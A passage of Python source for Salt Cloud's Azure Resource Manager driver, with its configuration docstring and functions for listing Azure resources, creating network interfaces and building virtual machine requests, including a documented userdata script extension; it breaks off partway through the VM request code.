* `azure-mgmt-compute <https://pypi.python.org/pypi/azure-mgmt-compute>`_ >= 0.33.0
* `azure-mgmt-network <https://pypi.python.org/pypi/azure-mgmt-network>`_ >= 0.30.0rc6
* `azure-mgmt-resource <https://pypi.python.org/pypi/azure-mgmt-resource>`_ >= 0.30.0
* `azure-mgmt-storage <https://pypi.python.org/pypi/azure-mgmt-storage>`_ >= 0.30.0rc6
* `azure-mgmt-web <https://pypi.python.org/pypi/azure-mgmt-web>`_ >= 0.30.0rc6
* `azure-storage <https://pypi.python.org/pypi/azure-storage>`_ >= 0.32.0
* `msrestazure <https://pypi.python.org/pypi/msrestazure>`_ >= 0.4.21
:configuration:
Required provider parameters:
if using username and password:
* ``subscription_id``
* ``username``
* ``password``
if using a service principal:
* ``subscription_id``
* ``tenant``
* ``client_id``
* ``secret``
Optional provider parameters:
**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud. Possible values:
* ``AZURE_PUBLIC_CLOUD`` (default)
* ``AZURE_CHINA_CLOUD``
* ``AZURE_US_GOV_CLOUD``
* ``AZURE_GERMAN_CLOUD``
* HTTP base URL for a custom endpoint, such as Azure Stack. The ``/metadata/endpoints`` path will be added to the URL.
**userdata** and **userdata_file**:
Azure Resource Manager uses a separate VirtualMachineExtension object to pass userdata scripts to the virtual
machine. Arbitrary shell commands can be passed via the ``userdata`` parameter, or via a file local to the Salt
Cloud system using the ``userdata_file`` parameter. Note that the local file is not treated as a script by the
extension, so "one-liners" probably work best. If greater functionality is desired, a web-hosted script file can
be specified via ``userdata_file: https://raw.githubusercontent.com/account/repo/master/azure-script.py``, which
will be executed on the system after VM creation. For Windows systems, script files ending in ``.ps1`` will be
executed with ``powershell.exe``. The ``userdata`` parameter takes precedence over the ``userdata_file`` parameter
when creating the custom script extension.
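    As a minimal illustrative sketch (the profile and provider names below are placeholders), a cloud profile could
    reference a web-hosted userdata script like this:
    .. code-block:: yaml
      my-azure-profile:
        provider: my-azure-config
        userdata_file: https://raw.githubusercontent.com/account/repo/master/azure-script.py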
**win_installer**:
This parameter, which holds the local path to the Salt Minion installer package, is used to determine if the
virtual machine type will be "Windows". Only set this parameter on profiles which install Windows operating systems.
Example ``/etc/salt/cloud.providers`` or
``/etc/salt/cloud.providers.d/azure.conf`` configuration:
.. code-block:: yaml
my-azure-config with username and password:
driver: azurearm
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
username: larry
password: 123pass
Or my-azure-config with service principal:
driver: azurearm
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
tenant: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
client_id: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
secret: XXXXXXXXXXXXXXXXXXXXXXXX
cloud_environment: AZURE_US_GOV_CLOUD
The Service Principal can be created with the new Azure CLI (https://github.com/Azure/azure-cli) with:
az ad sp create-for-rbac -n "http://<yourappname>" --role <role> --scopes <scope>
For example, this creates a service principal with 'owner' role for the whole subscription:
az ad sp create-for-rbac -n "http://mysaltapp" --role owner --scopes /subscriptions/3287abc8-f98a-c678-3bde-326766fd3617
*Note: review the details of Service Principals. Owner role is more than you normally need, and you can restrict
    scope to a resource group or individual resources.*
'''
# pylint: disable=wrong-import-position,wrong-import-order
from __future__ import absolute_import, print_function, unicode_literals
from multiprocessing import cpu_count
from multiprocessing.pool import ThreadPool
import importlib
import logging
import os
import os.path
import pprint
import string
import time
# Salt libs
import salt.cache
import salt.config as config
import salt.loader
import salt.utils.cloud
import salt.utils.files
import salt.utils.stringutils
import salt.utils.yaml
import salt.ext.six as six
import salt.version
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudSystemExit,
SaltCloudExecutionFailure,
SaltCloudExecutionTimeout,
)
# Import 3rd-party libs
HAS_LIBS = False
try:
import azure.mgmt.compute.models as compute_models
import azure.mgmt.network.models as network_models
from azure.storage.blob.blockblobservice import BlockBlobService
from msrestazure.azure_exceptions import CloudError
HAS_LIBS = True
except ImportError:
pass
__virtualname__ = 'azurearm'
log = logging.getLogger(__name__)
def __virtual__():
'''
Check for Azure configurations.
'''
if get_configured_provider() is False:
return False
if get_dependencies() is False:
return (
False,
'The following dependencies are required to use the AzureARM driver: '
'Microsoft Azure SDK for Python >= 2.0rc6, '
'Microsoft Azure Storage SDK for Python >= 0.32, '
'MS REST Azure (msrestazure) >= 0.4'
)
return __virtualname__
def get_api_versions(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Get a resource type api versions
'''
if kwargs is None:
kwargs = {}
if 'resource_provider' not in kwargs:
raise SaltCloudSystemExit(
'A resource_provider must be specified'
)
if 'resource_type' not in kwargs:
raise SaltCloudSystemExit(
'A resource_type must be specified'
)
api_versions = []
try:
resconn = get_conn(client_type='resource')
provider_query = resconn.providers.get(
resource_provider_namespace=kwargs['resource_provider']
)
for resource in provider_query.resource_types:
if six.text_type(resource.resource_type) == kwargs['resource_type']:
resource_dict = resource.as_dict()
api_versions = resource_dict['api_versions']
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
return api_versions
def get_resource_by_id(resource_id, api_version, extract_value=None):
'''
Get an AzureARM resource by id
'''
ret = {}
try:
resconn = get_conn(client_type='resource')
resource_query = resconn.resources.get_by_id(
resource_id=resource_id,
api_version=api_version
)
resource_dict = resource_query.as_dict()
if extract_value is not None:
ret = resource_dict[extract_value]
else:
ret = resource_dict
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
ret = {'Error': exc.message}
return ret
def get_configured_provider():
'''
Return the first configured provider instance.
'''
def __is_provider_configured(opts, provider, required_keys=()):
'''
Check if the provider is configured.
'''
if ':' in provider:
alias, driver = provider.split(':')
if alias not in opts['providers']:
return False
if driver not in opts['providers'][alias]:
return False
for key in required_keys:
if opts['providers'][alias][driver].get(key, None) is None:
return False
return opts['providers'][alias][driver]
for alias, drivers in six.iteritems(opts['providers']):
for driver, provider_details in six.iteritems(drivers):
if driver != provider:
continue
skip_provider = False
for key in required_keys:
if provider_details.get(key, None) is None:
# This provider does not include all necessary keys,
# continue to next one.
skip_provider = True
break
if skip_provider:
continue
return provider_details
return False
provider = __is_provider_configured(
__opts__,
__active_provider_name__ or __virtualname__,
('subscription_id', 'tenant', 'client_id', 'secret')
)
if provider is False:
provider = __is_provider_configured(
__opts__,
__active_provider_name__ or __virtualname__,
('subscription_id', 'username', 'password')
)
return provider
def get_dependencies():
'''
Warn if dependencies aren't met.
'''
return config.check_driver_dependencies(
__virtualname__,
{'azurearm': HAS_LIBS}
)
def get_conn(client_type):
'''
Return a connection object for a client type.
'''
conn_kwargs = {}
conn_kwargs['subscription_id'] = salt.utils.stringutils.to_str(
config.get_cloud_config_value(
'subscription_id',
get_configured_provider(), __opts__, search_global=False
)
)
cloud_env = config.get_cloud_config_value(
'cloud_environment',
get_configured_provider(), __opts__, search_global=False
)
if cloud_env is not None:
conn_kwargs['cloud_environment'] = cloud_env
tenant = config.get_cloud_config_value(
'tenant',
get_configured_provider(), __opts__, search_global=False
)
if tenant is not None:
client_id = config.get_cloud_config_value(
'client_id',
get_configured_provider(), __opts__, search_global=False
)
secret = config.get_cloud_config_value(
'secret',
get_configured_provider(), __opts__, search_global=False
)
conn_kwargs.update({'client_id': client_id, 'secret': secret,
'tenant': tenant})
else:
username = config.get_cloud_config_value(
'username',
get_configured_provider(), __opts__, search_global=False
)
password = config.get_cloud_config_value(
'password',
get_configured_provider(), __opts__, search_global=False
)
conn_kwargs.update({'username': username, 'password': password})
client = __utils__['azurearm.get_client'](
client_type=client_type, **conn_kwargs
)
return client
def get_location(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Return the location that is configured for this provider
'''
if not kwargs:
kwargs = {}
vm_dict = get_configured_provider()
vm_dict.update(kwargs)
return config.get_cloud_config_value(
'location',
vm_dict, __opts__, search_global=False
)
def avail_locations(call=None):
'''
Return a dict of all available regions.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_locations function must be called with '
'-f or --function, or with the --list-locations option'
)
ret = {}
ret['locations'] = []
try:
resconn = get_conn(client_type='resource')
provider_query = resconn.providers.get(
resource_provider_namespace='Microsoft.Compute'
)
locations = []
for resource in provider_query.resource_types:
if six.text_type(resource.resource_type) == 'virtualMachines':
resource_dict = resource.as_dict()
locations = resource_dict['locations']
for location in locations:
lowercase = location.lower().replace(' ', '')
ret['locations'].append(lowercase)
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
ret = {'Error': exc.message}
return ret
def avail_images(call=None):
'''
Return a dict of all available images on the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_images function must be called with '
'-f or --function, or with the --list-images option'
)
compconn = get_conn(client_type='compute')
region = get_location()
publishers = []
ret = {}
def _get_publisher_images(publisher):
'''
Get all images from a specific publisher
'''
data = {}
try:
offers = compconn.virtual_machine_images.list_offers(
location=region,
publisher_name=publisher,
)
for offer_obj in offers:
offer = offer_obj.as_dict()
skus = compconn.virtual_machine_images.list_skus(
location=region,
publisher_name=publisher,
offer=offer['name'],
)
for sku_obj in skus:
sku = sku_obj.as_dict()
results = compconn.virtual_machine_images.list(
location=region,
publisher_name=publisher,
offer=offer['name'],
skus=sku['name'],
)
for version_obj in results:
version = version_obj.as_dict()
name = '|'.join((
publisher,
offer['name'],
sku['name'],
version['name'],
))
data[name] = {
'publisher': publisher,
'offer': offer['name'],
'sku': sku['name'],
'version': version['name'],
}
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
data = {publisher: exc.message}
return data
try:
publishers_query = compconn.virtual_machine_images.list_publishers(
location=region
)
for publisher_obj in publishers_query:
publisher = publisher_obj.as_dict()
publishers.append(publisher['name'])
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
pool = ThreadPool(cpu_count() * 6)
results = pool.map_async(_get_publisher_images, publishers)
results.wait()
ret = {k: v for result in results.get() for k, v in six.iteritems(result)}
return ret
def avail_sizes(call=None):
'''
Return a list of sizes available from the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_sizes function must be called with '
'-f or --function, or with the --list-sizes option'
)
compconn = get_conn(client_type='compute')
ret = {}
location = get_location()
try:
sizes = compconn.virtual_machine_sizes.list(
location=location
)
for size_obj in sizes:
size = size_obj.as_dict()
ret[size['name']] = size
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
ret = {'Error': exc.message}
return ret
def list_nodes(call=None):
'''
List VMs on this Azure account
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes function must be called with -f or --function.'
)
ret = {}
nodes = list_nodes_full()
for node in nodes:
ret[node] = {'name': node}
for prop in ('id', 'image', 'size', 'state', 'private_ips', 'public_ips'):
ret[node][prop] = nodes[node].get(prop)
return ret
def list_nodes_full(call=None):
'''
List all VMs on the subscription with full information
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes_full function must be called with -f or --function.'
)
netapi_versions = get_api_versions(kwargs={
'resource_provider': 'Microsoft.Network',
'resource_type': 'networkInterfaces'
}
)
netapi_version = netapi_versions[0]
compconn = get_conn(client_type='compute')
ret = {}
def _get_node_info(node):
'''
Get node info.
'''
node_ret = {}
node['id'] = node['vm_id']
node['size'] = node['hardware_profile']['vm_size']
node['state'] = node['provisioning_state']
node['public_ips'] = []
node['private_ips'] = []
node_ret[node['name']] = node
try:
image_ref = node['storage_profile']['image_reference']
node['image'] = '|'.join([
image_ref['publisher'],
image_ref['offer'],
image_ref['sku'],
image_ref['version'],
])
except (TypeError, KeyError):
try:
node['image'] = node['storage_profile']['os_disk']['image']['uri']
except (TypeError, KeyError):
node['image'] = node.get('storage_profile', {}).get('image_reference', {}).get('id')
try:
netifaces = node['network_profile']['network_interfaces']
for index, netiface in enumerate(netifaces):
netiface_name = get_resource_by_id(
netiface['id'],
netapi_version,
'name'
)
netiface, pubips, privips = _get_network_interface(
netiface_name,
node['resource_group']
)
node['network_profile']['network_interfaces'][index].update(netiface)
node['public_ips'].extend(pubips)
node['private_ips'].extend(privips)
except Exception:
pass
node_ret[node['name']] = node
return node_ret
for group in list_resource_groups():
nodes = []
nodes_query = compconn.virtual_machines.list(
resource_group_name=group
)
for node_obj in nodes_query:
node = node_obj.as_dict()
node['resource_group'] = group
nodes.append(node)
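        # Resolve NIC and IP details for each VM concurrently; each worker handles one node.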
pool = ThreadPool(cpu_count() * 6)
results = pool.map_async(_get_node_info, nodes)
results.wait()
group_ret = {k: v for result in results.get() for k, v in six.iteritems(result)}
ret.update(group_ret)
return ret
def list_resource_groups(call=None):
'''
List resource groups associated with the subscription
'''
if call == 'action':
raise SaltCloudSystemExit(
            'The list_resource_groups function must be called with '
'-f or --function'
)
resconn = get_conn(client_type='resource')
ret = {}
try:
groups = resconn.resource_groups.list()
for group_obj in groups:
group = group_obj.as_dict()
ret[group['name']] = group
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('resource', exc.message)
ret = {'Error': exc.message}
return ret
def show_instance(name, call=None):
'''
Show the details from AzureARM concerning an instance
'''
if call != 'action':
raise SaltCloudSystemExit(
'The show_instance action must be called with -a or --action.'
)
try:
node = list_nodes_full('function')[name]
except KeyError:
log.debug('Failed to get data for node \'%s\'', name)
node = {}
__utils__['cloud.cache_node'](node, __active_provider_name__, __opts__)
return node
def delete_interface(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Delete a network interface.
'''
if kwargs is None:
kwargs = {}
netconn = get_conn(client_type='network')
if kwargs.get('resource_group') is None:
kwargs['resource_group'] = config.get_cloud_config_value(
'resource_group', {}, __opts__, search_global=True
)
ips = []
iface = netconn.network_interfaces.get(
kwargs['resource_group'],
kwargs['iface_name'],
)
iface_name = iface.name
for ip_ in iface.ip_configurations:
ips.append(ip_.name)
poller = netconn.network_interfaces.delete(
kwargs['resource_group'],
kwargs['iface_name'],
)
poller.wait()
for ip_ in ips:
poller = netconn.public_ip_addresses.delete(kwargs['resource_group'], ip_)
poller.wait()
return {iface_name: ips}
def _get_public_ip(name, resource_group):
'''
Get the public ip address details by name.
'''
netconn = get_conn(client_type='network')
try:
pubip_query = netconn.public_ip_addresses.get(
resource_group_name=resource_group,
public_ip_address_name=name
)
pubip = pubip_query.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('network', exc.message)
pubip = {'error': exc.message}
return pubip
def _get_network_interface(name, resource_group):
'''
Get a network interface.
'''
public_ips = []
private_ips = []
netapi_versions = get_api_versions(kwargs={
'resource_provider': 'Microsoft.Network',
'resource_type': 'publicIPAddresses'
}
)
netapi_version = netapi_versions[0]
netconn = get_conn(client_type='network')
netiface_query = netconn.network_interfaces.get(
resource_group_name=resource_group,
network_interface_name=name
)
netiface = netiface_query.as_dict()
for index, ip_config in enumerate(netiface['ip_configurations']):
if ip_config.get('private_ip_address') is not None:
private_ips.append(ip_config['private_ip_address'])
if 'id' in ip_config.get('public_ip_address', {}):
public_ip_name = get_resource_by_id(
ip_config['public_ip_address']['id'],
netapi_version,
'name'
)
public_ip = _get_public_ip(public_ip_name, resource_group)
public_ips.append(public_ip['ip_address'])
netiface['ip_configurations'][index]['public_ip_address'].update(public_ip)
return netiface, public_ips, private_ips
def create_network_interface(call=None, kwargs=None):
'''
Create a network interface.
'''
if call != 'action':
raise SaltCloudSystemExit(
'The create_network_interface action must be called with -a or --action.'
)
# pylint: disable=invalid-name
IPAllocationMethod = getattr(
network_models,
'IPAllocationMethod'
)
# pylint: disable=invalid-name
NetworkInterface = getattr(
network_models,
'NetworkInterface'
)
# pylint: disable=invalid-name
NetworkInterfaceIPConfiguration = getattr(
network_models,
'NetworkInterfaceIPConfiguration'
)
# pylint: disable=invalid-name
PublicIPAddress = getattr(
network_models,
'PublicIPAddress'
)
if not isinstance(kwargs, dict):
kwargs = {}
vm_ = kwargs
netconn = get_conn(client_type='network')
if kwargs.get('location') is None:
kwargs['location'] = get_location()
if kwargs.get('network') is None:
kwargs['network'] = config.get_cloud_config_value(
'network', vm_, __opts__, search_global=False
)
if kwargs.get('subnet') is None:
kwargs['subnet'] = config.get_cloud_config_value(
'subnet', vm_, __opts__, search_global=False
)
if kwargs.get('network_resource_group') is None:
kwargs['network_resource_group'] = config.get_cloud_config_value(
'resource_group', vm_, __opts__, search_global=False
)
if kwargs.get('iface_name') is None:
kwargs['iface_name'] = '{0}-iface0'.format(vm_['name'])
try:
subnet_obj = netconn.subnets.get(
resource_group_name=kwargs['network_resource_group'],
virtual_network_name=kwargs['network'],
subnet_name=kwargs['subnet'],
)
except CloudError as exc:
raise SaltCloudSystemExit(
'{0} (Resource Group: "{1}", VNET: "{2}", Subnet: "{3}")'.format(
exc.message,
kwargs['network_resource_group'],
kwargs['network'],
kwargs['subnet']
)
)
ip_kwargs = {}
ip_configurations = None
if 'load_balancer_backend_address_pools' in kwargs:
pool_dicts = kwargs['load_balancer_backend_address_pools']
if isinstance(pool_dicts, dict):
pool_ids = []
for load_bal, be_pools in pool_dicts.items():
for pool in be_pools:
try:
lbbep_data = netconn.load_balancer_backend_address_pools.get(
kwargs['resource_group'],
load_bal,
pool,
)
pool_ids.append({'id': lbbep_data.as_dict()['id']})
except CloudError as exc:
log.error('There was a cloud error: %s', six.text_type(exc))
except KeyError as exc:
log.error('There was an error getting the Backend Pool ID: %s', six.text_type(exc))
ip_kwargs['load_balancer_backend_address_pools'] = pool_ids
if 'private_ip_address' in kwargs.keys():
ip_kwargs['private_ip_address'] = kwargs['private_ip_address']
ip_kwargs['private_ip_allocation_method'] = IPAllocationMethod.static
else:
ip_kwargs['private_ip_allocation_method'] = IPAllocationMethod.dynamic
if kwargs.get('allocate_public_ip') is True:
pub_ip_name = '{0}-ip'.format(kwargs['iface_name'])
poller = netconn.public_ip_addresses.create_or_update(
resource_group_name=kwargs['resource_group'],
public_ip_address_name=pub_ip_name,
parameters=PublicIPAddress(
location=kwargs['location'],
public_ip_allocation_method=IPAllocationMethod.static,
),
)
count = 0
poller.wait()
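        # Poll until the public IP address is allocated (up to ~120 attempts at 5-second intervals).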
while True:
try:
pub_ip_data = netconn.public_ip_addresses.get(
kwargs['resource_group'],
pub_ip_name,
)
if pub_ip_data.ip_address: # pylint: disable=no-member
ip_kwargs['public_ip_address'] = PublicIPAddress(
six.text_type(pub_ip_data.id), # pylint: disable=no-member
)
ip_configurations = [
NetworkInterfaceIPConfiguration(
name='{0}-ip'.format(kwargs['iface_name']),
subnet=subnet_obj,
**ip_kwargs
)
]
break
except CloudError as exc:
                log.error('There was a cloud error: %s', exc)
count += 1
if count > 120:
raise ValueError('Timed out waiting for public IP Address.')
time.sleep(5)
else:
priv_ip_name = '{0}-ip'.format(kwargs['iface_name'])
ip_configurations = [
NetworkInterfaceIPConfiguration(
name=priv_ip_name,
subnet=subnet_obj,
**ip_kwargs
)
]
network_security_group = None
if kwargs.get('security_group') is not None:
network_security_group = netconn.network_security_groups.get(
resource_group_name=kwargs['resource_group'],
network_security_group_name=kwargs['security_group'],
)
iface_params = NetworkInterface(
location=kwargs['location'],
network_security_group=network_security_group,
ip_configurations=ip_configurations,
)
poller = netconn.network_interfaces.create_or_update(
kwargs['resource_group'], kwargs['iface_name'], iface_params
)
try:
poller.wait()
except Exception as exc:
log.warning('Network interface creation could not be polled. '
'It is likely that we are reusing an existing interface. (%s)', exc)
count = 0
while True:
try:
return _get_network_interface(kwargs['iface_name'], kwargs['resource_group'])
except CloudError:
count += 1
if count > 120:
raise ValueError('Timed out waiting for operation to complete.')
time.sleep(5)
def request_instance(vm_):
'''
Request a VM from Azure.
'''
compconn = get_conn(client_type='compute')
# pylint: disable=invalid-name
CachingTypes = getattr(
compute_models, 'CachingTypes'
)
# pylint: disable=invalid-name
DataDisk = getattr(
compute_models, 'DataDisk'
)
# pylint: disable=invalid-name
DiskCreateOptionTypes = getattr(
compute_models, 'DiskCreateOptionTypes'
)
# pylint: disable=invalid-name
HardwareProfile = getattr(
compute_models, 'HardwareProfile'
)
# pylint: disable=invalid-name
ImageReference = getattr(
compute_models, 'ImageReference'
)
# pylint: disable=invalid-name
LinuxConfiguration = getattr(
compute_models, 'LinuxConfiguration'
)
# pylint: disable=invalid-name
SshConfiguration = getattr(
compute_models, 'SshConfiguration'
)
# pylint: disable=invalid-name
SshPublicKey = getattr(
compute_models, 'SshPublicKey'
)
# pylint: disable=invalid-name
NetworkInterfaceReference = getattr(
compute_models, 'NetworkInterfaceReference'
)
# pylint: disable=invalid-name
NetworkProfile = getattr(
compute_models, 'NetworkProfile'
)
# pylint: disable=invalid-name
OSDisk = getattr(
compute_models, 'OSDisk'
)
# pylint: disable=invalid-name
OSProfile = getattr(
compute_models, 'OSProfile'
)
# pylint: disable=invalid-name
StorageProfile = getattr(
compute_models, 'StorageProfile'
)
# pylint: disable=invalid-name
VirtualHardDisk = getattr(
compute_models, 'VirtualHardDisk'
)
# pylint: disable=invalid-name
VirtualMachine = getattr(
compute_models, 'VirtualMachine'
)
# pylint: disable=invalid-name
VirtualMachineSizeTypes = getattr(
compute_models, 'VirtualMachineSizeTypes'
)
subscription_id = config.get_cloud_config_value(
'subscription_id',
get_configured_provider(), __opts__, search_global=False
)
if vm_.get('driver') is None:
vm_['driver'] = 'azurearm'
if vm_.get('location') is None:
vm_['location'] = get_location()
if vm_.get('resource_group') is None:
vm_['resource_group'] = config.get_cloud_config_value(
'resource_group', vm_, __opts__, search_global=True
)
if vm_.get('name') is None:
vm_['name'] = config.get_cloud_config_value(
'name', vm_, __opts__, search_global=True
)
# pylint: disable=unused-variable
iface_data, public_ips, private_ips = create_network_interface(
call='action',
kwargs=vm_
)
vm_['iface_id'] = iface_data['id']
disk_name = '{0}-vol0'.format(vm_['name'])
vm_username = config.get_cloud_config_value(
'ssh_username', vm_, __opts__, search_global=True,
default=config.get_cloud_config_value(
'win_username', vm_, __opts__, search_global=True
)
)
ssh_publickeyfile_contents = None
ssh_publickeyfile = config.get_cloud_config_value(
'ssh_publickeyfile',
vm_,
__opts__,
search_global=False,
default=None
)
if ssh_publickeyfile is not None:
try:
with salt.utils.files.fopen(ssh_publickeyfile, 'r') as spkc_:
ssh_publickeyfile_contents = spkc_.read()
except Exception as exc:
raise SaltCloudConfigError(
"Failed to read ssh publickey file '{0}': "
"{1}".format(ssh_publickeyfile,
exc.args[-1])
)
disable_password_authentication = config.get_cloud_config_value(
'disable_password_authentication',
vm_,
__opts__,
search_global=False,
default=False
)
vm_password = salt.utils.stringutils.to_str(
config.get_cloud_config_value(
'ssh_password', vm_, __opts__, search_global=True,
default=config.get_cloud_config_value(
'win_password', vm_, __opts__, search_global=True
)
)
)
os_kwargs = {}
win_installer = config.get_cloud_config_value(
'win_installer', vm_, __opts__, search_global=True
)
if not win_installer and ssh_publickeyfile_contents is not None:
sshpublickey = SshPublicKey(
key_data=ssh_publickeyfile_contents,
path='/home/{0}/.ssh/authorized_keys'.format(vm_username),
)
sshconfiguration = SshConfiguration(
public_keys=[sshpublickey],
)
linuxconfiguration = LinuxConfiguration(
disable_password_authentication=disable_password_authentication,
ssh=sshconfiguration,
)
os_kwargs['linux_configuration'] = linuxconfiguration
if win_installer or (vm_password is not None and not disable_password_authentication):
if not isinstance(vm_password, str):
raise SaltCloudSystemExit(
'The admin password must be a string.'
)
if len(vm_password) < 8 or len(vm_password) > 123:
raise SaltCloudSystemExit(
'The admin password must be between 8-123 characters long.'
)
complexity = 0
if any(char.isdigit() for char in vm_password):
complexity += 1
if any(char.isupper() for char in vm_password):
complexity += 1
if any(char.islower() for char in vm_password):
complexity += 1
if any(char in string.punctuation for char in vm_password):
complexity += 1
if complexity < 3:
raise SaltCloudSystemExit(
'The admin password must contain at least 3 of the following types: '
'upper, lower, digits, special characters'
)
os_kwargs['admin_password'] = vm_password
availability_set = config.get_cloud_config_value(
'availability_set',
vm_,
__opts__,
search_global=False,
default=None
)
if availability_set is not None and isinstance(availability_set, six.string_types):
availability_set = {
'id': '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/availabilitySets/{2}'.format(
subscription_id,
vm_['resource_group'],
availability_set
)
}
else:
availability_set = None
cloud_env = _get_cloud_environment()
storage_endpoint_suffix = cloud_env.suffixes.storage_endpoint
if isinstance(vm_.get('volumes'), six.string_types):
volumes = salt.utils.yaml.safe_load(vm_['volumes'])
else:
volumes = vm_.get('volumes')
data_disks = None
if isinstance(volumes, list):
data_disks = []
else:
volumes = []
lun = 0
luns = []
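    # Normalize each data-disk definition and assign the next free LUN (0-15).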
for volume in volumes:
if isinstance(volume, six.string_types):
volume = {'name': volume}
        volume.setdefault(
            'name',
            '{0}-datadisk{1}'.format(vm_['name'], six.text_type(lun))
        )
volume.setdefault(
'disk_size_gb',
volume.get(
'logical_disk_size_in_gb',
volume.get('size', 100)
)
)
# Old kwarg was host_caching, new name is caching
volume.setdefault('caching', volume.get('host_caching', 'ReadOnly'))
while lun in luns:
lun += 1
if lun > 15:
log.error('Maximum lun count has been reached')
break
volume.setdefault('lun', lun)
lun += 1
# The default vhd is {vm_name}-datadisk{lun}.vhd
if 'media_link' in volume:
volume['vhd'] = VirtualHardDisk(volume['media_link'])
del volume['media_link']
elif volume.get('vhd') == 'unmanaged':
volume['vhd'] = VirtualHardDisk(
'https://{0}.blob.{1}/vhds/{2}-datadisk{3}.vhd'.format(
vm_['storage_account'],
storage_endpoint_suffix,
vm_['name'],
volume['lun'],
),
)
elif 'vhd' in volume:
volume['vhd'] = VirtualHardDisk(volume['vhd'])
if 'image' in volume:
volume['create_option'] = 'from_image'
elif 'attach' in volume:
volume['create_option'] = 'attach'
else:
volume['create_option'] = 'empty'
data_disks.append(DataDisk(**volume))
img_ref = None
if vm_['image'].startswith('http') or vm_.get('vhd') == 'unmanaged':
if vm_['image'].startswith('http'):
source_image = VirtualHardDisk(vm_['image'])
else:
source_image = None
if '|' in vm_['image']:
img_pub, img_off, img_sku, img_ver = vm_['image'].split('|')
img_ref = ImageReference(
publisher=img_pub,
offer=img_off,
sku=img_sku,
version=img_ver,
)
elif vm_['image'].startswith('/subscriptions'):
img_ref = ImageReference(id=vm_['image'])
if win_installer:
os_type = 'Windows'
else:
os_type = 'Linux'
os_disk = OSDisk(
caching=CachingTypes.none,
create_option=DiskCreateOptionTypes.from_image,
name=disk_name,
vhd=VirtualHardDisk(
'https://{0}.blob.{1}/vhds/{2}.vhd'.format(
vm_['storage_account'],
storage_endpoint_suffix,
disk_name,
),
),
os_type=os_type,
image=source_image,
disk_size_gb=vm_.get('os_disk_size_gb')
)
else:
source_image = None
os_type = None
os_disk = OSDisk(
create_option=DiskCreateOptionTypes.from_image,
disk_size_gb=vm_.get('os_disk_size_gb')
)
if '|' in vm_['image']:
img_pub, img_off, img_sku, img_ver = vm_['image'].split('|')
img_ref = ImageReference(
publisher=img_pub,
offer=img_off,
sku=img_sku,
version=img_ver,
)
elif vm_['image'].startswith('/subscriptions'):
img_ref = ImageReference(id=vm_['image'])
userdata_file = config.get_cloud_config_value(
'userdata_file', vm_, __opts__, search_global=False, default=None
)
userdata = config.get_cloud_config_value(
'userdata', vm_, __opts__, search_global=False, default=None
)
userdata_template = config.get_cloud_config_value(
'userdata_template', vm_, __opts__, search_global=False, default=None
)
if userdata_file:
if os.path.exists(userdata_file):
with salt.utils.files.fopen(userdata_file, 'r') as fh_:
userdata = fh_.read()
if userdata and userdata_template:
userdata_sendkeys = config.get_cloud_config_value(
'userdata_sendkeys', vm_, __opts__, search_global=False, default=None
)
if userdata_sendkeys:
vm_['priv_key'], vm_['pub_key'] = salt.utils.cloud.gen_keys(
config.get_cloud_config_value(
'keysize',
vm_,
__opts__
)
)
key_id = vm_.get('name')
if 'append_domain' in vm_:
key_id = '.'.join([key_id, vm_['append_domain']])
salt.utils.cloud.accept_key(
__opts__['pki_dir'], vm_['pub_key'], key_id
)
userdata = salt.utils.cloud.userdata_template(__opts__, vm_, userdata)
custom_extension = None
if userdata is not None or userdata_file is not None:
try:
if win_installer:
publisher = 'Microsoft.Compute'
virtual_machine_extension_type = 'CustomScriptExtension'
type_handler_version = '1.8'
if userdata_file and userdata_file.endswith('.ps1'):
command_prefix = 'powershell -ExecutionPolicy Unrestricted -File '
else:
command_prefix = ''
else:
publisher = 'Microsoft.Azure.Extensions'
virtual_machine_extension_type = 'CustomScript'
type_handler_version = '2.0'
command_prefix = ''
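            # Inline userdata becomes the command to execute; a hosted script URL is downloaded via fileUris and run instead.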
settings = {}
if userdata:
settings['commandToExecute'] = userdata
elif userdata_file.startswith('http'):
settings['fileUris'] = [userdata_file]
settings['commandToExecute'] = command_prefix + './' + userdata_file[userdata_file.rfind('/')+1:]
custom_extension = {
'resource_group': vm_['resource_group'],
'virtual_machine_name': vm_['name'],
'extension_name': vm_['name'] + '_custom_userdata_script',
'location': vm_['location'],
'publisher': publisher,
'virtual_machine_extension_type': virtual_machine_extension_type,
'type_handler_version': type_handler_version,
'auto_upgrade_minor_version': True,
'settings': settings,
'protected_settings': None
}
except Exception as exc:
log.exception('Failed to encode userdata: %s', exc)
params = VirtualMachine(
location=vm_['location'],
plan=None,
hardware_profile=HardwareProfile(
vm_size=getattr(
VirtualMachineSizeTypes, vm_['size'].lower()
),
),
storage_profile=StorageProfile(
os_disk=os_disk,
data_disks=data_disks,
image_reference=img_ref,
),
os_profile=OSProfile(
admin_username=vm_username,
computer_name=vm_['name'],
**os_kwargs
),
network_profile=NetworkProfile(
network_interfaces=[
NetworkInterfaceReference(vm_['iface_id']),
],
),
availability_set=availability_set,
)
__utils__['cloud.fire_event'](
'event',
'requesting instance',
'salt/cloud/{0}/requesting'.format(vm_['name']),
args=__utils__['cloud.filter_event'](
'requesting',
vm_,
['name', 'profile', 'provider', 'driver']
),
sock_dir=__opts__['sock_dir'],
transport=__opts__['transport']
)
try:
